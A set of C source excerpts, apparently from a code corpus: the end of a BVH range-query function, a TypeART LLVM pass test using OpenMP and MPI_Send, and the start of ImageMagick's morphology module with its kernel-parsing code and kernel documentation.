float co[3];
co[0] = node->bv[0];
co[1] = node->bv[2];
co[2] = node->bv[4];
#endif
}
else
{
int i;
for(i=0; i != node->totnode; i++)
{
float nearest[3];
float dist = calc_nearest_point(data->center, node->children[i], nearest);
if(dist < data->radius)
{
//Its a leaf.. call the callback
if(node->children[i]->totnode == 0)
{
data->hits++;
data->callback( data->userdata, node->children[i]->index, dist );
}
else
dfs_range_query( data, node->children[i] );
}
}
}
}
int BLI_bvhtree_range_query(BVHTree *tree, const float *co, float radius, BVHTree_RangeQuery callback, void *userdata)
{
BVHNode * root = tree->nodes[tree->totleaf];
RangeQueryData data;
data.tree = tree;
data.center = co;
data.radius = radius*radius;
data.hits = 0;
data.callback = callback;
data.userdata = userdata;
if(root != NULL)
{
float nearest[3];
float dist = calc_nearest_point(data.center, root, nearest);
if(dist < data.radius)
{
//Its a leaf.. call the callback
if(root->totnode == 0)
{
data.hits++;
data.callback( data.userdata, root->index, dist );
}
else
dfs_range_query( &data, root );
}
}
return data.hits;
}
|
20_omp_priv_combi_nested.c | // clang-format off
// RUN: %c-to-llvm -fno-discard-value-names %omp_c_flags %s | %apply-typeart -typeart-alloca -call-filter -S 2>&1 | FileCheck %s
// RUN: %c-to-llvm -fno-discard-value-names %omp_c_flags %s | opt -O2 -S | %apply-typeart -typeart-alloca -call-filter -S 2>&1 | FileCheck %s --check-prefix=check-opt
// RUN: %c-to-llvm -fno-discard-value-names %omp_c_flags %s | %apply-typeart -typeart-alloca -call-filter -S | FileCheck %s --check-prefix=check-inst
// RUN: %c-to-llvm -fno-discard-value-names %omp_c_flags %s | opt -O2 -S | %apply-typeart -typeart-alloca -call-filter -S | FileCheck %s --check-prefix=check-opt-inst
// REQUIRES: openmp
// clang-format on
#include "omp.h"
// NOTE: with opt, the compiler passes the address until the MPI_Send, hence
// only the initial allocation is tracked.
extern void MPI_Send(void*, int);
void func(int* x, int* e) {
// check-inst: define {{.*}} @func
// check-inst-NOT: call void @__typeart_alloc_stack
// check-opt-inst: define {{.*}} @func
// check-opt-inst-NOT: call void @__typeart_alloc_stack
// check-inst: define {{.*}} @.omp_outlined
// check-inst: call void @__typeart_alloc_stack_omp(i8* %0, i32 10, i64 1)
// check-opt-inst: define {{.*}} @.omp_outlined
// check-opt-inst-NOT: call void @__typeart_alloc_stack_omp
#pragma omp parallel for firstprivate(x), lastprivate(x), shared(e)
for (int i = 0; i < 10; ++i) {
// Analysis should not filter x, but e...
MPI_Send((void*)x, *e);
}
}
void foo() {
// check-inst: define {{.*}} @foo
// check-inst: call void @__typeart_alloc_stack(i8* %0, i32 2, i64 1)
// check-opt-inst: define {{.*}} @foo
// check-opt-inst: call void @__typeart_alloc_stack(i8* %0, i32 2, i64 1)
int x = 1;
int y = 2;
#pragma omp parallel
{ func(&x, &y); }
}
void func_other(int* x, int* e) {
// check-inst: define {{.*}} @func_other
// check-inst-NOT: call void @__typeart_alloc_stack
// check-opt-inst: define {{.*}} @func_other
// check-opt-inst-NOT: call void @__typeart_alloc_stack
// check-inst: define {{.*}} @.omp_outlined
// check-inst: call void @__typeart_alloc_stack_omp(i8* %0, i32 10, i64 1)
// check-opt-inst: define {{.*}} @.omp_outlined
// check-opt-inst-NOT: call void @__typeart_alloc_stack_omp
#pragma omp parallel for firstprivate(x), lastprivate(x), shared(e)
for (int i = 0; i < 10; ++i) {
// Analysis should not filter x, but e...
MPI_Send(x, *e);
}
MPI_Send(x, *e);
}
void bar(int x_other) {
// check-inst: define {{.*}} @bar
// check-inst: call void @__typeart_alloc_stack(i8* %0, i32 2, i64 1)
// check-opt-inst: define {{.*}} @bar
// check-opt-inst: call void @__typeart_alloc_stack(i8* %0, i32 2, i64 1)
int x = x_other;
int y = 2;
#pragma omp parallel
{ func_other(&x, &y); }
}
// CHECK: TypeArtPass [Heap & Stack]
// CHECK-NEXT: Malloc : 0
// CHECK-NEXT: Free : 0
// CHECK-NEXT: Alloca : 4
// CHECK-NEXT: Global : 0
// check-opt: TypeArtPass [Heap & Stack]
// check-opt: Malloc : 0
// check-opt: Free : 0
// check-opt: Alloca : 2
// check-opt: Global : 0 |
morphology.c | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M M OOO RRRR PPPP H H OOO L OOO GGGG Y Y %
% MM MM O O R R P P H H O O L O O G Y Y %
% M M M O O RRRR PPPP HHHHH O O L O O G GGG Y %
% M M O O R R P H H O O L O O G G Y %
% M M OOO R R P H H OOO LLLLL OOO GGG Y %
% %
% %
% MagickCore Morphology Methods %
% %
% Software Design %
% Anthony Thyssen %
% January 2010 %
% %
% %
% Copyright 1999-2017 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% https://www.imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% Morphology is the application of various kernels, of any size or shape, to an
% image in various ways (typically binary, but not always).
%
% Convolution (weighted sum or average) is just one specific type of
% morphology. Just one that is very common for image bluring and sharpening
% effects. Not only 2D Gaussian blurring, but also 2-pass 1D Blurring.
%
% This module provides not only a general morphology function, and the ability
% to apply more advanced or iterative morphologies, but also functions for the
% generation of many different types of kernel arrays from user supplied
% arguments. Prehaps even the generation of a kernel from a small image.
*/
/*
Include declarations.
*/
#include "MagickCore/studio.h"
#include "MagickCore/artifact.h"
#include "MagickCore/cache-view.h"
#include "MagickCore/channel.h"
#include "MagickCore/color-private.h"
#include "MagickCore/enhance.h"
#include "MagickCore/exception.h"
#include "MagickCore/exception-private.h"
#include "MagickCore/gem.h"
#include "MagickCore/gem-private.h"
#include "MagickCore/image.h"
#include "MagickCore/image-private.h"
#include "MagickCore/linked-list.h"
#include "MagickCore/list.h"
#include "MagickCore/magick.h"
#include "MagickCore/memory_.h"
#include "MagickCore/memory-private.h"
#include "MagickCore/monitor-private.h"
#include "MagickCore/morphology.h"
#include "MagickCore/morphology-private.h"
#include "MagickCore/option.h"
#include "MagickCore/pixel-accessor.h"
#include "MagickCore/pixel-private.h"
#include "MagickCore/prepress.h"
#include "MagickCore/quantize.h"
#include "MagickCore/resource_.h"
#include "MagickCore/registry.h"
#include "MagickCore/semaphore.h"
#include "MagickCore/splay-tree.h"
#include "MagickCore/statistic.h"
#include "MagickCore/string_.h"
#include "MagickCore/string-private.h"
#include "MagickCore/thread-private.h"
#include "MagickCore/token.h"
#include "MagickCore/utility.h"
#include "MagickCore/utility-private.h"
/*
Other global definitions used by module.
*/
#define Minimize(assign,value) assign=MagickMin(assign,value)
#define Maximize(assign,value) assign=MagickMax(assign,value)
/* Integer Factorial Function - for a Binomial kernel */
#if 1
static inline size_t fact(size_t n)
{
size_t f,l;
for(f=1, l=2; l <= n; f=f*l, l++);
return(f);
}
#elif 1 /* glibc floating point alternatives */
#define fact(n) ((size_t)tgamma((double)n+1))
#else
#define fact(n) ((size_t)lgamma((double)n+1))
#endif
/* Currently these are only internal to this module */
static void
CalcKernelMetaData(KernelInfo *),
ExpandMirrorKernelInfo(KernelInfo *),
ExpandRotateKernelInfo(KernelInfo *, const double),
RotateKernelInfo(KernelInfo *, double);
/* Quick function to find last kernel in a kernel list */
static inline KernelInfo *LastKernelInfo(KernelInfo *kernel)
{
while (kernel->next != (KernelInfo *) NULL)
kernel=kernel->next;
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% A c q u i r e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% AcquireKernelInfo() takes the given string (generally supplied by the
% user) and converts it into a Morphology/Convolution Kernel. This allows
% users to specify a kernel from a number of pre-defined kernels, or to fully
% specify their own kernel for a specific Convolution or Morphology
% Operation.
%
% The kernel so generated can be any rectangular array of floating point
% values (doubles) with the 'control point' or 'pixel being affected'
% anywhere within that array of values.
%
% Previously IM was restricted to a square of odd size using the exact
% center as origin, this is no longer the case, and any rectangular kernel
% with any value being declared the origin. This in turn allows the use of
% highly asymmetrical kernels.
%
% The floating point values in the kernel can also include a special value
% known as 'nan' or 'not a number' to indicate that this value is not part
% of the kernel array. This allows you to shaped the kernel within its
% rectangular area. That is 'nan' values provide a 'mask' for the kernel
% shape. However at least one non-nan value must be provided for correct
% working of a kernel.
%
% The returned kernel should be freed using the DestroyKernelInfo() when you
% are finished with it. Do not free this memory yourself.
%
% Input kernel defintion strings can consist of any of three types.
%
% "name:args[[@><]"
% Select from one of the built in kernels, using the name and
% geometry arguments supplied. See AcquireKernelBuiltIn()
%
% "WxH[+X+Y][@><]:num, num, num ..."
% a kernel of size W by H, with W*H floating point numbers following.
% the 'center' can be optionally be defined at +X+Y (such that +0+0
% is top left corner). If not defined the pixel in the center, for
% odd sizes, or to the immediate top or left of center for even sizes
% is automatically selected.
%
% "num, num, num, num, ..."
% list of floating point numbers defining an 'old style' odd sized
% square kernel. At least 9 values should be provided for a 3x3
% square kernel, 25 for a 5x5 square kernel, 49 for 7x7, etc.
% Values can be space or comma separated. This is not recommended.
%
% You can define a 'list of kernels' which can be used by some morphology
% operators A list is defined as a semi-colon separated list kernels.
%
% " kernel ; kernel ; kernel ; "
%
% Any extra ';' characters, at start, end or between kernel defintions are
% simply ignored.
%
% The special flags will expand a single kernel, into a list of rotated
% kernels. A '@' flag will expand a 3x3 kernel into a list of 45-degree
% cyclic rotations, while a '>' will generate a list of 90-degree rotations.
% The '<' also exands using 90-degree rotates, but giving a 180-degree
% reflected kernel before the +/- 90-degree rotations, which can be important
% for Thinning operations.
%
% Note that 'name' kernels will start with an alphabetic character while the
% new kernel specification has a ':' character in its specification string.
% If neither is the case, it is assumed an old style of a simple list of
% numbers generating a odd-sized square kernel has been given.
%
% The format of the AcquireKernal method is:
%
% KernelInfo *AcquireKernelInfo(const char *kernel_string)
%
% A description of each parameter follows:
%
% o kernel_string: the Morphology/Convolution kernel wanted.
%
*/
/* This was separated so that it could be used as a separate
** array input handling function, such as for -color-matrix
*/
static KernelInfo *ParseKernelArray(const char *kernel_string)
{
KernelInfo
*kernel;
char
token[MagickPathExtent];
const char
*p,
*end;
register ssize_t
i;
double
nan = sqrt((double)-1.0); /* Special Value : Not A Number */
MagickStatusType
flags;
GeometryInfo
args;
kernel=(KernelInfo *) AcquireQuantumMemory(1,sizeof(*kernel));
if (kernel == (KernelInfo *) NULL)
return(kernel);
(void) ResetMagickMemory(kernel,0,sizeof(*kernel));
kernel->minimum = kernel->maximum = kernel->angle = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->type = UserDefinedKernel;
kernel->next = (KernelInfo *) NULL;
kernel->signature=MagickCoreSignature;
if (kernel_string == (const char *) NULL)
return(kernel);
/* find end of this specific kernel definition string */
end = strchr(kernel_string, ';');
if ( end == (char *) NULL )
end = strchr(kernel_string, '\0');
/* clear flags - for Expanding kernel lists thorugh rotations */
flags = NoValue;
/* Has a ':' in argument - New user kernel specification
FUTURE: this split on ':' could be done by StringToken()
*/
p = strchr(kernel_string, ':');
if ( p != (char *) NULL && p < end)
{
/* ParseGeometry() needs the geometry separated! -- Arrgghh */
memcpy(token, kernel_string, (size_t) (p-kernel_string));
token[p-kernel_string] = '\0';
SetGeometryInfo(&args);
flags = ParseGeometry(token, &args);
/* Size handling and checks of geometry settings */
if ( (flags & WidthValue) == 0 ) /* if no width then */
args.rho = args.sigma; /* then width = height */
if ( args.rho < 1.0 ) /* if width too small */
args.rho = 1.0; /* then width = 1 */
if ( args.sigma < 1.0 ) /* if height too small */
args.sigma = args.rho; /* then height = width */
kernel->width = (size_t)args.rho;
kernel->height = (size_t)args.sigma;
/* Offset Handling and Checks */
if ( args.xi < 0.0 || args.psi < 0.0 )
return(DestroyKernelInfo(kernel));
kernel->x = ((flags & XValue)!=0) ? (ssize_t)args.xi
: (ssize_t) (kernel->width-1)/2;
kernel->y = ((flags & YValue)!=0) ? (ssize_t)args.psi
: (ssize_t) (kernel->height-1)/2;
if ( kernel->x >= (ssize_t) kernel->width ||
kernel->y >= (ssize_t) kernel->height )
return(DestroyKernelInfo(kernel));
p++; /* advance beyond the ':' */
}
else
{ /* ELSE - Old old specification, forming odd-square kernel */
/* count up number of values given */
p=(const char *) kernel_string;
while ((isspace((int) ((unsigned char) *p)) != 0) || (*p == '\''))
p++; /* ignore "'" chars for convolve filter usage - Cristy */
for (i=0; p < end; i++)
{
GetNextToken(p,&p,MagickPathExtent,token);
if (*token == ',')
GetNextToken(p,&p,MagickPathExtent,token);
}
/* set the size of the kernel - old sized square */
kernel->width = kernel->height= (size_t) sqrt((double) i+1.0);
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
p=(const char *) kernel_string;
while ((isspace((int) ((unsigned char) *p)) != 0) || (*p == '\''))
p++; /* ignore "'" chars for convolve filter usage - Cristy */
}
/* Read in the kernel values from rest of input string argument */
kernel->values=(MagickRealType *) MagickAssumeAligned(AcquireAlignedMemory(
kernel->width,kernel->height*sizeof(*kernel->values)));
if (kernel->values == (MagickRealType *) NULL)
return(DestroyKernelInfo(kernel));
kernel->minimum=MagickMaximumValue;
kernel->maximum=(-MagickMaximumValue);
kernel->negative_range = kernel->positive_range = 0.0;
for (i=0; (i < (ssize_t) (kernel->width*kernel->height)) && (p < end); i++)
{
GetNextToken(p,&p,MagickPathExtent,token);
if (*token == ',')
GetNextToken(p,&p,MagickPathExtent,token);
if ( LocaleCompare("nan",token) == 0
|| LocaleCompare("-",token) == 0 ) {
kernel->values[i] = nan; /* this value is not part of neighbourhood */
}
else {
kernel->values[i] = StringToDouble(token,(char **) NULL);
( kernel->values[i] < 0)
? ( kernel->negative_range += kernel->values[i] )
: ( kernel->positive_range += kernel->values[i] );
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
}
}
/* sanity check -- no more values in kernel definition */
GetNextToken(p,&p,MagickPathExtent,token);
if ( *token != '\0' && *token != ';' && *token != '\'' )
return(DestroyKernelInfo(kernel));
#if 0
/* this was the old method of handling a incomplete kernel */
if ( i < (ssize_t) (kernel->width*kernel->height) ) {
Minimize(kernel->minimum, kernel->values[i]);
Maximize(kernel->maximum, kernel->values[i]);
for ( ; i < (ssize_t) (kernel->width*kernel->height); i++)
kernel->values[i]=0.0;
}
#else
/* Number of values for kernel was not enough - Report Error */
if ( i < (ssize_t) (kernel->width*kernel->height) )
return(DestroyKernelInfo(kernel));
#endif
/* check that we recieved at least one real (non-nan) value! */
if (kernel->minimum == MagickMaximumValue)
return(DestroyKernelInfo(kernel));
if ( (flags & AreaValue) != 0 ) /* '@' symbol in kernel size */
ExpandRotateKernelInfo(kernel, 45.0); /* cyclic rotate 3x3 kernels */
else if ( (flags & GreaterValue) != 0 ) /* '>' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 90.0); /* 90 degree rotate of kernel */
else if ( (flags & LessValue) != 0 ) /* '<' symbol in kernel args */
ExpandMirrorKernelInfo(kernel); /* 90 degree mirror rotate */
return(kernel);
}
static KernelInfo *ParseKernelName(const char *kernel_string,
ExceptionInfo *exception)
{
char
token[MagickPathExtent];
const char
*p,
*end;
GeometryInfo
args;
KernelInfo
*kernel;
MagickStatusType
flags;
ssize_t
type;
/* Parse special 'named' kernel */
GetNextToken(kernel_string,&p,MagickPathExtent,token);
type=ParseCommandOption(MagickKernelOptions,MagickFalse,token);
if ( type < 0 || type == UserDefinedKernel )
return((KernelInfo *) NULL); /* not a valid named kernel */
while (((isspace((int) ((unsigned char) *p)) != 0) ||
(*p == ',') || (*p == ':' )) && (*p != '\0') && (*p != ';'))
p++;
end = strchr(p, ';'); /* end of this kernel defintion */
if ( end == (char *) NULL )
end = strchr(p, '\0');
/* ParseGeometry() needs the geometry separated! -- Arrgghh */
memcpy(token, p, (size_t) (end-p));
token[end-p] = '\0';
SetGeometryInfo(&args);
flags = ParseGeometry(token, &args);
#if 0
/* For Debugging Geometry Input */
(void) FormatLocaleFile(stderr, "Geometry = 0x%04X : %lg x %lg %+lg %+lg\n",
flags, args.rho, args.sigma, args.xi, args.psi );
#endif
/* special handling of missing values in input string */
switch( type ) {
/* Shape Kernel Defaults */
case UnityKernel:
if ( (flags & WidthValue) == 0 )
args.rho = 1.0; /* Default scale = 1.0, zero is valid */
break;
case SquareKernel:
case DiamondKernel:
case OctagonKernel:
case DiskKernel:
case PlusKernel:
case CrossKernel:
if ( (flags & HeightValue) == 0 )
args.sigma = 1.0; /* Default scale = 1.0, zero is valid */
break;
case RingKernel:
if ( (flags & XValue) == 0 )
args.xi = 1.0; /* Default scale = 1.0, zero is valid */
break;
case RectangleKernel: /* Rectangle - set size defaults */
if ( (flags & WidthValue) == 0 ) /* if no width then */
args.rho = args.sigma; /* then width = height */
if ( args.rho < 1.0 ) /* if width too small */
args.rho = 3; /* then width = 3 */
if ( args.sigma < 1.0 ) /* if height too small */
args.sigma = args.rho; /* then height = width */
if ( (flags & XValue) == 0 ) /* center offset if not defined */
args.xi = (double)(((ssize_t)args.rho-1)/2);
if ( (flags & YValue) == 0 )
args.psi = (double)(((ssize_t)args.sigma-1)/2);
break;
/* Distance Kernel Defaults */
case ChebyshevKernel:
case ManhattanKernel:
case OctagonalKernel:
case EuclideanKernel:
if ( (flags & HeightValue) == 0 ) /* no distance scale */
args.sigma = 100.0; /* default distance scaling */
else if ( (flags & AspectValue ) != 0 ) /* '!' flag */
args.sigma = QuantumRange/(args.sigma+1); /* maximum pixel distance */
else if ( (flags & PercentValue ) != 0 ) /* '%' flag */
args.sigma *= QuantumRange/100.0; /* percentage of color range */
break;
default:
break;
}
kernel = AcquireKernelBuiltIn((KernelInfoType)type, &args, exception);
if ( kernel == (KernelInfo *) NULL )
return(kernel);
/* global expand to rotated kernel list - only for single kernels */
if ( kernel->next == (KernelInfo *) NULL ) {
if ( (flags & AreaValue) != 0 ) /* '@' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 45.0);
else if ( (flags & GreaterValue) != 0 ) /* '>' symbol in kernel args */
ExpandRotateKernelInfo(kernel, 90.0);
else if ( (flags & LessValue) != 0 ) /* '<' symbol in kernel args */
ExpandMirrorKernelInfo(kernel);
}
return(kernel);
}
MagickExport KernelInfo *AcquireKernelInfo(const char *kernel_string,
ExceptionInfo *exception)
{
KernelInfo
*kernel,
*new_kernel;
char
*kernel_cache,
token[MagickPathExtent];
const char
*p;
if (kernel_string == (const char *) NULL)
return(ParseKernelArray(kernel_string));
p=kernel_string;
kernel_cache=(char *) NULL;
if (*kernel_string == '@')
{
kernel_cache=FileToString(kernel_string+1,~0UL,exception);
if (kernel_cache == (char *) NULL)
return((KernelInfo *) NULL);
p=(const char *) kernel_cache;
}
kernel=NULL;
while (GetNextToken(p,(const char **) NULL,MagickPathExtent,token), *token != '\0')
{
/* ignore extra or multiple ';' kernel separators */
if (*token != ';')
{
/* tokens starting with alpha is a Named kernel */
if (isalpha((int) ((unsigned char) *token)) != 0)
new_kernel=ParseKernelName(p,exception);
else /* otherwise a user defined kernel array */
new_kernel=ParseKernelArray(p);
/* Error handling -- this is not proper error handling! */
if (new_kernel == (KernelInfo *) NULL)
{
if (kernel != (KernelInfo *) NULL)
kernel=DestroyKernelInfo(kernel);
return((KernelInfo *) NULL);
}
/* initialise or append the kernel list */
if (kernel == (KernelInfo *) NULL)
kernel=new_kernel;
else
LastKernelInfo(kernel)->next=new_kernel;
}
/* look for the next kernel in list */
p=strchr(p,';');
if (p == (char *) NULL)
break;
p++;
}
if (kernel_cache != (char *) NULL)
kernel_cache=DestroyString(kernel_cache);
return(kernel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% A c q u i r e K e r n e l B u i l t I n %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% AcquireKernelBuiltIn() returned one of the 'named' built-in types of
% kernels used for special purposes such as gaussian blurring, skeleton
% pruning, and edge distance determination.
%
% They take a KernelType, and a set of geometry style arguments, which were
% typically decoded from a user supplied string, or from a more complex
% Morphology Method that was requested.
%
% The format of the AcquireKernalBuiltIn method is:
%
% KernelInfo *AcquireKernelBuiltIn(const KernelInfoType type,
% const GeometryInfo args)
%
% A description of each parameter follows:
%
% o type: the pre-defined type of kernel wanted
%
% o args: arguments defining or modifying the kernel
%
% Convolution Kernels
%
% Unity
% The a No-Op or Scaling single element kernel.
%
% Gaussian:{radius},{sigma}
% Generate a two-dimensional gaussian kernel, as used by -gaussian.
% The sigma for the curve is required. The resulting kernel is
% normalized,
%
% If 'sigma' is zero, you get a single pixel on a field of zeros.
%
% NOTE: that the 'radius' is optional, but if provided can limit (clip)
% the final size of the resulting kernel to a square 2*radius+1 in size.
% The radius should be at least 2 times that of the sigma value, or
% sever clipping and aliasing may result. If not given or set to 0 the
% radius will be determined so as to produce the best minimal error
% result, which is usally much larger than is normally needed.
%
% LoG:{radius},{sigma}
% "Laplacian of a Gaussian" or "Mexician Hat" Kernel.
% The supposed ideal edge detection, zero-summing kernel.
%
% An alturnative to this kernel is to use a "DoG" with a sigma ratio of
% approx 1.6 (according to wikipedia).
%
% DoG:{radius},{sigma1},{sigma2}
% "Difference of Gaussians" Kernel.
% As "Gaussian" but with a gaussian produced by 'sigma2' subtracted
% from the gaussian produced by 'sigma1'. Typically sigma2 > sigma1.
% The result is a zero-summing kernel.
%
% Blur:{radius},{sigma}[,{angle}]
% Generates a 1 dimensional or linear gaussian blur, at the angle given
% (current restricted to orthogonal angles). If a 'radius' is given the
% kernel is clipped to a width of 2*radius+1. Kernel can be rotated
% by a 90 degree angle.
%
% If 'sigma' is zero, you get a single pixel on a field of zeros.
%
% Note that two convolutions with two "Blur" kernels perpendicular to
% each other, is equivalent to a far larger "Gaussian" kernel with the
% same sigma value, However it is much faster to apply. This is how the
% "-blur" operator actually works.
%
% Comet:{width},{sigma},{angle}
% Blur in one direction only, much like how a bright object leaves
% a comet like trail. The Kernel is actually half a gaussian curve,
% Adding two such blurs in opposite directions produces a Blur Kernel.
% Angle can be rotated in multiples of 90 degrees.
%
% Note that the first argument is the width of the kernel and not the
% radius of the kernel.
%
% Binomial:[{radius}]
% Generate a discrete kernel using a 2 dimentional Pascel's Triangle
% of values. Used for special forma of image filters.
%
% # Still to be implemented...
% #
% # Filter2D
% # Filter1D
% # Set kernel values using a resize filter, and given scale (sigma)
% # Cylindrical or Linear. Is this possible with an image?
% #
%
% Named Constant Convolution Kernels
%
% All these are unscaled, zero-summing kernels by default. As such for
% non-HDRI version of ImageMagick some form of normalization, user scaling,
% and biasing the results is recommended, to prevent the resulting image
% being 'clipped'.
%
% The 3x3 kernels (most of these) can be circularly rotated in multiples of
% 45 degrees to generate the 8 angled varients of each of the kernels.
%
% Laplacian:{type}
% Discrete Lapacian Kernels, (without normalization)
% Type 0 : 3x3 with center:8 surounded by -1 (8 neighbourhood)
% Type 1 : 3x3 with center:4 edge:-1 corner:0 (4 neighbourhood)
% Type 2 : 3x3 with center:4 edge:1 corner:-2
% Type 3 : 3x3 with center:4 edge:-2 corner:1
% Type 5 : 5x5 laplacian
% Type 7 : 7x7 laplacian
% Type 15 : 5x5 LoG (sigma approx 1.4)
% Type 19 : 9x9 LoG (sigma approx 1.4)
%
% Sobel:{angle}
% Sobel 'Edge' convolution kernel (3x3)
% | -1, 0, 1 |
% | -2, 0,-2 |
% | -1, 0, 1 |
%
% Roberts:{angle}
% Roberts convolution kernel (3x3)
% | 0, 0, 0 |
% | -1, 1, 0 |
% | 0, 0, 0 |
%
% Prewitt:{angle}
% Prewitt Edge convolution kernel (3x3)
% | -1, 0, 1 |
% | -1, 0, 1 |
% | -1, 0, 1 |
%
% Compass:{angle}
% Prewitt's "Compass" convolution kernel (3x3)
% | -1, 1, 1 |
% | -1,-2, 1 |
% | -1, 1, 1 |
%
% Kirsch:{angle}
% Kirsch's "Compass" convolution kernel (3x3)
% | -3,-3, 5 |
% | -3, 0, 5 |
% | -3,-3, 5 |
%
% FreiChen:{angle}
% Frei-Chen Edge Detector is based on a kernel that is similar to
% the Sobel Kernel, but is designed to be isotropic. That is it takes
% into account the distance of the diagonal in the kernel.
%
% | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) |
% | 1, 0, -1 |
%
% FreiChen:{type},{angle}
%
% Frei-Chen Pre-weighted kernels...
%
% Type 0: default un-nomalized version shown above.
%
% Type 1: Orthogonal Kernel (same as type 11 below)
% | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 1, 0, -1 |
%
% Type 2: Diagonal form of Kernel...
% | 1, sqrt(2), 0 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 0, -sqrt(2) -1 |
%
% However this kernel is als at the heart of the FreiChen Edge Detection
% Process which uses a set of 9 specially weighted kernel. These 9
% kernels not be normalized, but directly applied to the image. The
% results is then added together, to produce the intensity of an edge in
% a specific direction. The square root of the pixel value can then be
% taken as the cosine of the edge, and at least 2 such runs at 90 degrees
% from each other, both the direction and the strength of the edge can be
% determined.
%
% Type 10: All 9 of the following pre-weighted kernels...
%
% Type 11: | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 1, 0, -1 |
%
% Type 12: | 1, sqrt(2), 1 |
% | 0, 0, 0 | / 2*sqrt(2)
% | 1, sqrt(2), 1 |
%
% Type 13: | sqrt(2), -1, 0 |
% | -1, 0, 1 | / 2*sqrt(2)
% | 0, 1, -sqrt(2) |
%
% Type 14: | 0, 1, -sqrt(2) |
% | -1, 0, 1 | / 2*sqrt(2)
% | sqrt(2), -1, 0 |
%
% Type 15: | 0, -1, 0 |
% | 1, 0, 1 | / 2
% | 0, -1, 0 |
%
% Type 16: | 1, 0, -1 |
% | 0, 0, 0 | / 2
% | -1, 0, 1 |
%
% Type 17: | 1, -2, 1 |
% | -2, 4, -2 | / 6
% | -1, -2, 1 |
%
% Type 18: | -2, 1, -2 |
% | 1, 4, 1 | / 6
% | -2, 1, -2 |
%
% Type 19: | 1, 1, 1 |
% | 1, 1, 1 | / 3
% | 1, 1, 1 |
%
% The first 4 are for edge detection, the next 4 are for line detection
% and the last is to add a average component to the results.
%
% Using a special type of '-1' will return all 9 pre-weighted kernels
% as a multi-kernel list, so that you can use them directly (without
% normalization) with the special "-set option:morphology:compose Plus"
% setting to apply the full FreiChen Edge Detection Technique.
%
% If 'type' is large it will be taken to be an actual rotation angle for
% the default FreiChen (type 0) kernel. As such FreiChen:45 will look
% like a Sobel:45 but with 'sqrt(2)' instead of '2' values.
%
% WARNING: The above was layed out as per
% http://www.math.tau.ac.il/~turkel/notes/edge_detectors.pdf
% But rotated 90 degrees so direction is from left rather than the top.
% I have yet to find any secondary confirmation of the above. The only
% other source found was actual source code at
% http://ltswww.epfl.ch/~courstiv/exos_labos/sol3.pdf
% Neigher paper defineds the kernels in a way that looks locical or
% correct when taken as a whole.
%
% Boolean Kernels
%
% Diamond:[{radius}[,{scale}]]
% Generate a diamond shaped kernel with given radius to the points.
% Kernel size will again be radius*2+1 square and defaults to radius 1,
% generating a 3x3 kernel that is slightly larger than a square.
%
% Square:[{radius}[,{scale}]]
% Generate a square shaped kernel of size radius*2+1, and defaulting
% to a 3x3 (radius 1).
%
% Octagon:[{radius}[,{scale}]]
% Generate octagonal shaped kernel of given radius and constant scale.
% Default radius is 3 producing a 7x7 kernel. A radius of 1 will result
% in "Diamond" kernel.
%
% Disk:[{radius}[,{scale}]]
% Generate a binary disk, thresholded at the radius given, the radius
% may be a float-point value. Final Kernel size is floor(radius)*2+1
% square. A radius of 5.3 is the default.
%
% NOTE: That a low radii Disk kernels produce the same results as
% many of the previously defined kernels, but differ greatly at larger
% radii. Here is a table of equivalences...
% "Disk:1" => "Diamond", "Octagon:1", or "Cross:1"
% "Disk:1.5" => "Square"
% "Disk:2" => "Diamond:2"
% "Disk:2.5" => "Octagon"
% "Disk:2.9" => "Square:2"
% "Disk:3.5" => "Octagon:3"
% "Disk:4.5" => "Octagon:4"
% "Disk:5.4" => "Octagon:5"
% "Disk:6.4" => "Octagon:6"
% All other Disk shapes are unique to this kernel, but because a "Disk"
% is more circular when using a larger radius, using a larger radius is
% preferred over iterating the morphological operation.
%
% Rectangle:{geometry}
% Simply generate a rectangle of 1's with the size given. You can also
% specify the location of the 'control point', otherwise the closest
% pixel to the center of the rectangle is selected.
%
% Properly centered and odd sized rectangles work the best.
%
% Symbol Dilation Kernels
%
% These kernel is not a good general morphological kernel, but is used
% more for highlighting and marking any single pixels in an image using,
% a "Dilate" method as appropriate.
%
% For the same reasons iterating these kernels does not produce the
% same result as using a larger radius for the symbol.
%
% Plus:[{radius}[,{scale}]]
% Cross:[{radius}[,{scale}]]
% Generate a kernel in the shape of a 'plus' or a 'cross' with
% a each arm the length of the given radius (default 2).
%
% NOTE: "plus:1" is equivalent to a "Diamond" kernel.
%
% Ring:{radius1},{radius2}[,{scale}]
